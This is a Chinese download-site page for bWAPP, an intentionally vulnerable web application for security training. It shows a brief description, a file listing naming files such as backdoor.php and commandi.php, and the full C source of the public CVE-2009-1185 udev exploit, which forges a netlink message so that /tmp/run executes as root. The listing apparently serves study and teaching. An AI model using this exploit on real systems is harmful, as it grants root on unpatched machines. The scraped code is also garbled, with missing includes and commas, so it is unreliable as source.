資源簡介
buggy web Application 這是一個集成了各種常見漏洞和最新漏洞的開源Web應用程序,目的是幫助網絡安全愛好者、開發人員和學生發現并防止網絡漏洞。包含了超過100種漏洞,涵 蓋了所有主要的已知Web漏洞,包括OWASP Top10安全風險,最重要的是已經包含了OpenSSL和ShellShock漏洞。
代碼片段和文件信息
/*
?*?cve-2009-1185.c
?*
?*?udev??*?Jon?Oberheide?
?*?http://jon.oberheide.org
?*
?*?Information:
?*
?*???http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
?*
?*???udev?before?1.4.1?does?not?verify?whether?a?NETlink?message?originates?
?*???from?kernel?space?which?allows?local?users?to?gain?privileges?by?sending?
?*???a?NETlink?message?from?user?space.
?*
?*?Notes:
?*???
?*???An?alternate?version?of?kcope‘s?exploit.??This?exploit?leverages?the?
?*???95-udev-late.rules?functionality?that?is?meant?to?run?arbitrary?commands?
?*???when?a?device?is?removed.??A?bit?cleaner?and?reliable?as?long?as?your?
?*???distro?ships?that?rule?file.
?*
?*???Tested?on?Gentoo?Intrepid?and?Jaunty.
?*
?*?Usage:
?*
?*???Pass?the?PID?of?the?udevd?netlink?socket?(listed?in?/proc/net/netlink?
?*???usually?is?the?udevd?PID?minus?1)?as?argv[1].
?*
?*???The?exploit?will?execute?/tmp/run?as?root?so?throw?whatever?payload?you?
?*???want?in?there.
?*/
#include?
#include?
#include?
#include?
#include?
#include?
#include?
#include?
#include?nk.h>
#ifndef?NETlink_Kobject_UEVENT
#define?NETlink_Kobject_UEVENT?15
#endif
int
main(int?argc?char?**argv)
{
int?sock;
char?*mp?*err;
char?message[4096];
struct?stat?st;
struct?msghdr?msg;
struct?iovec?iovector;
struct?sockaddr_nl?address;
if?(argc? err?=?“Pass?the?udevd?netlink?PID?as?an?argument“;
printf(“[-]?Error:?%s\n“?err);
exit(1);
}
if?((stat(“/etc/udev/rules.d/95-udev-late.rules“?&st)?==?-1)?&&
????(stat(“/lib/udev/rules.d/95-udev-late.rules“?&st)?==?-1))?{
err?=?“Required?95-udev-late.rules?not?found“;
printf(“[-]?Error:?%s\n“?err);
exit(1);
}
if?(stat(“/tmp/run“?&st)?==?-1)?{
err?=?“/tmp/run?does?not?exist?please?create?it“;
printf(“[-]?Error:?%s\n“?err);
exit(1);
}
system(“chmod?+x?/tmp/run“);
memset(&address?0?sizeof(address));
address.nl_family?=?AF_NETlink;
address.nl_pid?=?atoi(argv[1]);
address.nl_groups?=?0;
msg.msg_name?=?(void*)&address;
msg.msg_namelen?=?sizeof(address);
msg.msg_iov?=?&iovector;
msg.msg_iovlen?=?1;
sock?=?socket(AF_NETlink?SOCK_DGRAM?NETlink_Kobject_UEVENT);
bind(sock?(struct?sockaddr?*)?&address?sizeof(address));
mp?=?message;
mp?+=?sprintf(mp?“remove@/d“)?+?1;
mp?+=?sprintf(mp?“SUBSYSTEM=block“)?+?1;
mp?+=?sprintf(mp?“DEVPATH=/dev/foo“)?+?1;
mp?+=?sprintf(mp?“TIMEOUT=10“)?+?1;
mp?+=?sprintf(mp?“ACTION=remove“)?+1;
mp?+=?sprintf(mp?“REMOVE_CMD=/tmp/run“)?+1;
iovector.iov_base?=?(void*)message;
iovector.iov_len?=?(int)(mp-message);
sendmsg(sock?&msg?0);
close(sock);
return?0;
}
//?milw0rm.com?[2009-04-30]
?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????文件?????????112??2014-03-08?15:05??bWAPP\666
?????文件????????4471??2014-09-27?17:58??bWAPP\admin\index.php
?????文件?????????645??2014-05-01?21:51??bWAPP\admin\phpinfo.php
?????文件????????2226??2014-09-29?11:00??bWAPP\admin\settings.php
?????文件????????2093??2014-05-11?00:27??bWAPP\aim.php
?????文件???????55719??2014-05-11?02:41??bWAPP\apps\movie_search
?????文件????????6623??2014-09-27?01:57??bWAPP\ba_captcha_bypass.php
?????文件???????10033??2014-09-27?01:57??bWAPP\ba_forgotten.php
?????文件????????1208??2014-05-01?21:51??bWAPP\ba_insecure_login.php
?????文件????????7551??2014-09-27?01:57??bWAPP\ba_insecure_login_1.php
?????文件????????9338??2014-09-27?01:57??bWAPP\ba_insecure_login_2.php
?????文件????????7471??2014-09-27?01:57??bWAPP\ba_insecure_login_3.php
?????文件????????4848??2014-09-27?01:57??bWAPP\ba_logout.php
?????文件????????1737??2014-05-18?20:56??bWAPP\ba_logout_1.php
?????文件????????1200??2014-05-01?21:51??bWAPP\ba_pwd_attacks.php
?????文件????????7524??2014-09-27?01:57??bWAPP\ba_pwd_attacks_1.php
?????文件????????7914??2014-09-27?01:57??bWAPP\ba_pwd_attacks_2.php
?????文件????????8212??2014-09-27?01:57??bWAPP\ba_pwd_attacks_3.php
?????文件????????8039??2014-09-27?01:57??bWAPP\ba_pwd_attacks_4.php
?????文件????????5894??2014-09-27?01:57??bWAPP\ba_weak_pwd.php
?????文件?????????732??2014-03-29?20:04??bWAPP\backdoor.php
?????文件????????5907??2014-09-27?01:57??bWAPP\bof_1.php
?????文件????????4804??2014-09-27?01:57??bWAPP\bof_2.php
?????文件????????7858??2014-11-02?22:57??bWAPP\bugs.txt
?????文件????????1821??2014-05-01?21:51??bWAPP\captcha.php
?????文件????????1101??2014-05-01?21:51??bWAPP\captcha_box.php
?????文件????????5941??2014-09-27?01:57??bWAPP\clickjacking.php
?????文件????????5584??2014-09-27?01:57??bWAPP\commandi.php
?????文件????????6133??2014-09-27?01:57??bWAPP\commandi_blind.php
?????文件?????????780??2014-05-01?21:51??bWAPP\config.inc
?????文件?????????963??2014-05-01?21:51??bWAPP\config.inc.php
............此處省略251個文件信息
評論
共有 條評論
川公網安備 51152502000135號